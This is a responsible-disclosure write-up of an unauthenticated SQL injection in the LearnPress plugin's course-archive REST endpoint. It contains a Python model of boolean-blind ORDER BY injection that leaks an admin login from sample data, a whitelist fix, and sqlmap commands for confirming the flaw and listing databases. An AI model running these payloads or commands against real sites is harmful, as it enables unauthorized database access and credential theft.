While exploring vulnerabilities in a major web hosting company in Indonesia, I discovered a critical SQL injection vulnerability in their online course platform. Although I am unable to disclose the company name or specific platform, this writeup outlines the discovery process and demonstrates the impact of the vulnerability.
I accessed the website and identified that it used WordPress with the LearnPress plugin. Upon further investigation, I found that their LearnPress plugin was outdated and vulnerable to SQL injection. Wordfence lists the issue as:
- Title: LearnPress <= 4.2.5.7 – Unauthenticated SQL Injection via order_by
- Reference: https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/learnpress/learnpress-4257-unauthenticated-sql-injection-via-order-by
The Wordfence post highlighted the order_by parameter as the vulnerable entry point. I examined the website and found an API endpoint that used this parameter:
https://example.com/wp-json/lp/v1/courses/archive-course?order_by=popular
This REST endpoint, which the front end calls via AJAX to fetch the course list, takes order_by straight from the query string, which made it a prime target for SQL injection testing.
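To show why an ORDER BY parameter is such a good injection point, here is a small added model of the bug class, written for this post; it is not LearnPress's code and it makes no claim about how that plugin is actually implemented. The table names, the sort-key map and the sample rows are all constructed for the example, and SQLite stands in for MySQL. The key detail is that an ORDER BY clause cannot be passed as a prepared-statement parameter, so a sort key that is not whitelisted ends up in the query verbatim. The oracle() and extract_admin_login() functions then show the boolean-based blind technique that sqlmap automates: a CASE expression flips the sort direction depending on a condition, and the first row returned leaks one bit per request.

```python
import sqlite3

# Constructed sample data; not taken from any real site.
COURSES = [
    (1, "Intro to PHP", 120),
    (2, "Advanced SQL", 300),
    (3, "WordPress Security", 45),
]
WP_USERS = [(1, "admin", "$P$constructedhash")]

# Hypothetical sort-key map: what a plugin might use to turn ?order_by=popular
# into an ORDER BY clause. ORDER BY cannot be bound as a prepared-statement
# parameter, so a fixed whitelist like this is the only safe way to build it.
ORDER_BY_MAP = {
    "popular": "enrollments DESC",
    "newest": "id DESC",
    "title": "title ASC",
}
DEFAULT_ORDER = "popular"


def make_db():
    """In-memory SQLite stand-in for the WordPress database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE courses (id INTEGER, title TEXT, enrollments INTEGER)")
    conn.executemany("INSERT INTO courses VALUES (?, ?, ?)", COURSES)
    conn.execute("CREATE TABLE wp_users (id INTEGER, user_login TEXT, user_pass TEXT)")
    conn.executemany("INSERT INTO wp_users VALUES (?, ?, ?)", WP_USERS)
    return conn


def archive_course_vulnerable(conn, order_by):
    """Vulnerable pattern: an unknown sort key is spliced into ORDER BY verbatim."""
    clause = ORDER_BY_MAP.get(order_by, order_by)
    rows = conn.execute(f"SELECT id FROM courses ORDER BY {clause}")
    return [row[0] for row in rows]


def archive_course_safe(conn, order_by):
    """Hardened: an unknown sort key falls back to a fixed default clause."""
    clause = ORDER_BY_MAP.get(order_by, ORDER_BY_MAP[DEFAULT_ORDER])
    rows = conn.execute(f"SELECT id FROM courses ORDER BY {clause}")
    return [row[0] for row in rows]


def oracle(conn, condition):
    """Boolean-based ORDER BY injection: sort ascending by id when `condition`
    holds and descending otherwise, then read the answer off the first row."""
    payload = f"(CASE WHEN ({condition}) THEN id ELSE -id END)"
    return archive_course_vulnerable(conn, payload)[0] == 1


def extract_admin_login(conn, max_len=16):
    """Leak wp_users.user_login one character at a time through the oracle.
    This linear scan is what sqlmap's boolean-based blind technique automates
    (sqlmap uses a bisection over character codes to cut the request count)."""
    alphabet = "abcdefghijklmnopqrstuvwxyz0123456789_-."
    leaked = ""
    for pos in range(1, max_len + 1):
        for ch in alphabet:
            cond = (
                f"(SELECT substr(user_login, {pos}, 1) FROM wp_users WHERE id = 1) = '{ch}'"
            )
            if oracle(conn, cond):
                leaked += ch
                break
        else:
            break  # no character matched: end of the string
    return leaked


if __name__ == "__main__":
    db = make_db()
    print(archive_course_vulnerable(db, "popular"))  # [2, 1, 3]
    print(extract_admin_login(db))  # admin
    # The same payload is harmless against the whitelisted version:
    print(archive_course_safe(db, "(CASE WHEN (1=1) THEN id ELSE -id END)"))  # [2, 1, 3]
```

The fix is the one-line difference between the two archive_course functions: unknown sort keys must map to a default, never to themselves. Note that parameter binding is no help here, which is why ORDER BY (and LIMIT, and column names) keep turning up as injection points in otherwise prepared-statement-clean code.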
To verify the vulnerability, I utilized sqlmap, a powerful SQL injection testing tool. First, I ran a basic scan to confirm the injection point:
./sqlmap -u "https://example.com/wp-json/lp/v1/courses/archive-course?order_by=popular*" --random-agent --level=3 --risk=3
The asterisk (*) after the order_by value marks the injection point for sqlmap, so it tests that position instead of guessing from the parameter list.
The scan results confirmed that the parameter was vulnerable. Next, I listed the available databases to assess the extent of the compromise:
./sqlmap -u "https://example.com/wp-json/lp/v1/courses/archive-course?order_by=popular*" --random-agent --level=3 --risk=3 --dbs
Result:
Upon confirming the vulnerability, I immediately reported it to the company. Recognizing the severity of the issue, they promptly acknowledged the report and rewarded me with 3 months of free hosting as a token of appreciation for identifying and responsibly disclosing the critical SQL injection vulnerability.
Thank you for reading, and happy hacking!